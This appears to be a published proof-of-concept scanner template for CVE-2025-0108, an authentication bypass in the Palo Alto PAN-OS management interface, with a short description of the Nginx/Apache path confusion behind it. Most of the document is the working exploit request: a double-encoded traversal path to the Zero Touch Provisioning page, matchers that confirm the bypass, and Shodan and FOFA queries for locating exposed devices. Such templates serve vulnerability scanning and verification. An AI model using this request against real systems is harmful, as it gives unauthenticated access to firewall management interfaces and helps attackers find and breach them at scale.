A vulnerability in PAN-OS management interface allows authentication bypass through path confusion between Nginx and Apache handlers.The issue occurs due to differences in path processing between Nginx and Apache, where double URL encoding combined with directory traversal can bypass authentication checks enforced by X-pan-AuthCheck header.
PoC代码[已公开]
id: CVE-2025-0108
info:
name: PAN-OS Management Interface - Path Confusion to Authentication Bypass
author: halencarjunior,ritikchaddha
severity: critical
description: |
A vulnerability in PAN-OS management interface allows authentication bypass through path confusion between Nginx and Apache handlers.The issue occurs due to differences in path processing between Nginx and Apache, where double URL encoding combined with directory traversal can bypass authentication checks enforced by X-pan-AuthCheck header.
reference:
- https://slcyber.io/blog/nginx-apache-path-confusion-to-auth-bypass-in-pan-os/
classification:
epss-score: 0.94007
epss-percentile: 0.99887
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id: CVE-2025-0108
cwe-id: CWE-287
metadata:
verified: true
max-request: 1
vendor: paloaltonetworks
product: pan-os
fofa-query: icon_hash="-631559155"
shodan-query:
- cpe:"cpe:2.3:o:paloaltonetworks:pan-os"
- http.favicon.hash:"-631559155"
tags: cve,cve2025,panos,auth-bypass,kev,vkev
http:
- method: GET
path:
- "{{BaseURL}}/unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css"
matchers:
- type: dsl
dsl:
- 'contains_any(body, "<title>Zero Touch Provisioning", "Zero Touch Provisioning (ZTP)")'
- 'contains(header, "text/html")'
- 'status_code == 200'
condition: and
# digest: 490a0046304402200fbec4da4227a158bcf3129cf37fc68d87c4a4f58fa7e62ebd95a20d00fca5a102207e8f563c3eed5e9c2cb66ee169e346f472d2e7fcb521e6509de55ab817c0ca08:922c64590222798bb761d5b6d8e72950